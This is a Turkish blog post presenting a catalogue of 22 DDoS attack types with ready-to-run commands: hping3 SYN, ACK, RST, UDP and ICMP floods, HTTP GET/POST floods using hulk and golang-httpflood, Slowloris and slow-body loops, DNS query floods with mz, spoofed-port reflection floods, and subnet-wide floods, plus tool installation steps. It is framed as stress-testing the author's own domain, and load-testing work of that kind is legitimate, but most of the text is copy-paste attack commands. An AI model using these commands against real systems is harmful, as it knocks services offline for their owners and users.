Merhabalar! Bu yazımda (old) ekip arkadaşlarım Ahmet Can Karaağaçlı, Emre Toraman ve Görkem Koç ile birlikte hazırladığımız, farklı DDoS atak türlerini simüle etmeyi sağlayan spesifik DDoS saldırılarını ve saldırı komutlarını sizlerle paylaşıyor olacağım.
Simüle ettiğimiz ve saldırı komutlarını paylaşacağım DDoS atak türleri ve atak detayları:
| No | DDoS Atak Türü | DDoS Atak Detayı |
| 01-) | TCP SYN Flood | TCP SYN Port 443 |
| 02-) | TCP SYN Flood | TCP SYN Random Port |
| 03-) | TCP ACK Flood | TCP ACK Port 443 |
| 04-) | TCP SYN ACK Flood | TCP SYN ACK Port 443 |
| 05-) | TCP SYN ACK Flood | TCP SYN ACK Random Port |
| 06-) | TCP RST Flood | TCP RST Port 443 |
| 07-) | UDP Flood | UDP Port 53 |
| 08-) | UDP Flood | UDP Random Port |
| 09-) | HTTP Get Flood | |
| 10-) | HTTP Random Get Flood | |
| 11-) | HTTP Post Flood | |
| 12-) | SlowLoris | |
| 13-) | SlowBody | |
| 14-) | DNS Query Flood | Query google.com |
| 15-) | DNS Subdomain Query Flood | Query ***.bariskoparmal.com |
| 16-) | ICMP Flood | |
| 17-) | NTP Reflection | UDP Flood source port 123 |
| 18-) | SNMP Reflection | UDP Flood source port 161 |
| 19-) | SSDP Reflection | UDP Flood source port 1900 |
| 20-) | DNS Reflection | UDP Flood source port 53 |
| 21-) | TCP SYN Flood Attack to IP Subnet | TCP SYN Random Port |
| 22-) | UDP Flood Attack to IP Subnet | UDP Random Port |
Hedef Kapsam:
Örnek senaryomuzda, DDoS komutlarımızı hazırlamak için saldıracağımız hedef sistemlerimizin bilgisi aşağıdaki gibidir:
- Hedef URL Adresi:
- Hedef IP Adresi:
- 192.168.1.40
- Hedef Subnet Adresi:
- 192.168.1.0/22
Gereksinimler
İlgili DDoS saldırı türlerini simüle edebilmek için aşağıda belirtilmiş olan gereksinim listesinde yer alan paketler ve araçların DDoS saldırısını gerçekleştirecek olan sistemlere kurulması gerekmektedir.
sudo apt-get install python -y
sudo apt-get install python3 -y
sudo apt-get install git -y
sudo apt install golang-go -y
sudo apt-get install hping3 -y
sudo apt-get install slowhttptest -y
sudo apt-get install mz -y
git clone https://github.com/grafov/hulk
git clone https://github.com/Leeon123/golang-httpflood.githping3 Manual
DDoS saldırılarımızın bir çoğunu hping3 aracı üzerinden hazırladık. İlgili hping3 DDoS saldırı komutları: Saldırı yapılacak olan hedefe, porta, atak türü için source port gibi bilgilere göre değiştirilmeli ve düzenlenmelidir. Bu sebep ile kullandığımız bazı hping3 parametreleri için ufak bir listeyi aşağıda paylaşıyorum. Hazırlanacak olan farklı DDoS saldırıları ve atak türleri için hping3 manuelini incelemenizi öneririm.
-s : Base Source Port
-p : Destination Port
-S : Set SYN Flag
-A : Set ACK Flag
-SA : Set SYN and ACK Flag
-R : Set RST Flag
--UDP : UDP Mode
--ICMP : ICMP Mode
--keep : Keep still Source Port
--rand-dest : Random Destination AddressDDoS Atak Türleri ve İlgili Saldırı Komutları
01-) TCP SYN Flood (TCP SYN – Port 443)
hping3 --flood -S -p 443 bariskoparmal.com02-) TCP SYN Flood (TCP SYN – Random Port)
hping3 --flood -S -p ++443 bariskoparmal.com03-) TCP ACK Flood (TCP ACK – Port 443)
hping3 --flood -A -p 443 bariskoparmal.com04-) TCP SYN ACK Flood (TCP SYN ACK – Port 443)
hping3 --flood -SA -p 443 bariskoparmal.com05-) TCP SYN ACK Flood (TCP SYN ACK – Random Port)
hping3 --flood -SA -p ++80 bariskoparmal.com06-) TCP RST Flood (TCP RST – Port 443)
hping3 --flood -R -p 443 bariskoparmal.com07-) UDP Flood (UDP – Port 53)
hping3 --flood --udp -p 53 ns1.bariskoparmal.com08-) UDP Flood (UDP – Random Port)
hping3 --flood --udp -p ++53 ns1.bariskoparmal.com09-) HTTP Get Flood
cd golang-httpflood/ && yes | go run httpflood.go "https://bariskoparmal.com/" 1000 get 6000 nil10-) HTTP Random Get Flood
go run ./hulk/hulk.go -site "https://bariskoparmal.com/"11-) HTTP Post Flood
cd golang-httpflood/ && yes | go run httpflood.go "https://bariskoparmal.com/" 1000 post 6000 nil12-) SlowLoris
while true; do slowhttptest -H -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t GET -u "https://bariskoparmal.com/"; sleep 60; done;13-) SlowBody
while true; do slowhttptest -B -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t POST -u "https://bariskoparmal.com/"; sleep 60; done;14-) DNS Query Flood (Query – google.com)
mz -B ns1.bariskoparmal.com -t dns "q=google.com" -c 10000000000015-) DNS Subdomain Query Flood (Query – ***.bariskoparmal.com)
mz -B ns1.bariskoparmal.com -t dns "q=vpn.bariskoparmal.com" -c 100000000000 16-) ICMP Flood
hping3 --flood --icmp bariskoparmal.com17-) NTP Reflection/Amplification (UDP Flood Based – Source Port 123)
hping3 -s 123 --keep --flood --udp -p 443 bariskoparmal.com18-) SNMP Reflection/Amplification (UDP Flood Based – Source Port 161)
hping3 -s 161 --keep --flood --udp -p 443 bariskoparmal.com19-) SSDP Reflection/Amplification (UDP Flood Based – Source Port 1900)
hping3 -s 1900 --keep --flood --udp -p 53 ns1.bariskoparmal.com20-) DNS Reflection/Amplification Attack (UDP Flood Based – Source Port 53)
hping3 -s 53 --keep --flood --udp -p 53 ns1.bariskoparmal.comVe yaptığımız testlerde en sevdiğimiz öldürücü silah olan, hedef sistemin IP Subnetinin farklı IP adresleri ve farklı Portlarına doğru saldırmamızı sağlayan saldırı komutları aşağıdaki gibidir. Gerçekleştirdiğimiz testlerde aşağıdaki saldırılar ile ana domain ve tüm subdomainlerinin aynı anda erişilemez hale gelmesi gibi farklı senaryoları tecrübe etmiştik.
21-) TCP SYN Flood Attack to IP Subnet (TCP SYN Based – Random Port)
hping3 --flood -S 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;22-) UDP Flood Attack to IP Subnet (UDP Based – Random Port)
hping3 --flood --udp 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;DDoS nedir, DDoS türleri nelerdir ve ne gibi önlemler alınabilir için önceden yazmış olduğum (D)DoS Saldırı Türleri yazısına göz atabilirsiniz.
0x041
Barış Koparmal 
very nice
BeğenBeğen